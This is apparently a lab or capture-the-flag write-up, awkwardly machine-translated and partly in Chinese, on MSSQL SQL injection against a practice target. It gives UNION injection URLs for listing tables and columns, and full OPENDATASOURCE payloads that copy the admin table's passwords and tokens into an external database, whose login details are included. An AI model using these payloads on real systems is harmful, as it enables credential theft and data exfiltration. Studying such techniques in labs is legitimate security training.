Tools: Hong Kong cloud of free cloud server: http: //www.webweb.com
Sign up using anonymous email: https: //bccto.me/
Hong Kong cloud server MSSQL database structures, and construction of the table admin, greater than or equal to the number of fields we want to get a table.
First, open the shooting range: http://59.63.200.79:8015/?id=1
try whether injection:
closure;
By queries to the table by three field order. By asking people to know there is also a binary large object field type is not supported order by --- so that is four fields, when construction of the table to build more of it as possible.
According to the first range of database table names video speaking, the field name query routine operation, easy to understand, but the actual injection rebound may not occur:
look-up table name: http://59.63.200.79:8015/?id=1 % 27% 20union% 20select% 20id , name, null% 20from% 20sysobjects% 20where% 20xtype =% 27U% 27 - +
Found its name in the tables sysobjects system comes with the table id.
Charles admin table field names: http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20syscolumns%20where%20id=1977058079%20--+
Look-up table of contents:
Find out the id, passwd, token. Which may be the token flag.
Then try to bounce injection:
Hong Kong registered Cloud:
Account: saddadsadadsa
Hong Kong shipped Password: 12345678
database library name: DB_14B8A3E_AAAA
database password: 12345678
database link address: SQL5006.webweb.com
Database Username: DB_14B8A3E_AAAA_admin
in Hong Kong cloud database, create a table of greater than three fields for receiving data.
We have created a four-field table called admin to receive rebound inject data;
to build the statement: insert into opendatasource ( 'sqloledb' , '= SQL5006.webweb.com server, 1433; uid = DB_14B8A3E_AAAA_admin; pwd = 12345678; database = DB_14B8A3E_AAAA ') .DB_14B8A3E_AAAA.dbo.admin select * from admin - +
status of implementation:
获得flag.当然这里数据只有一条,实战中应该结合系统自代表一步步查询。
insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select null,null,name,null from sysobjects where xtype=’U’ —+
查询出所有用户创建表:
获得表的id。
查询admin表中字段:insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select * from syscolumns where id=1977058079 —+
获得字段.
获得表中数据:insert into opendatasource(‘sqloledb’,’server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA’).DB_14B8A3E_AAAA.dbo.admin select%20 id,passwd,token,username from admin —+
获得flag.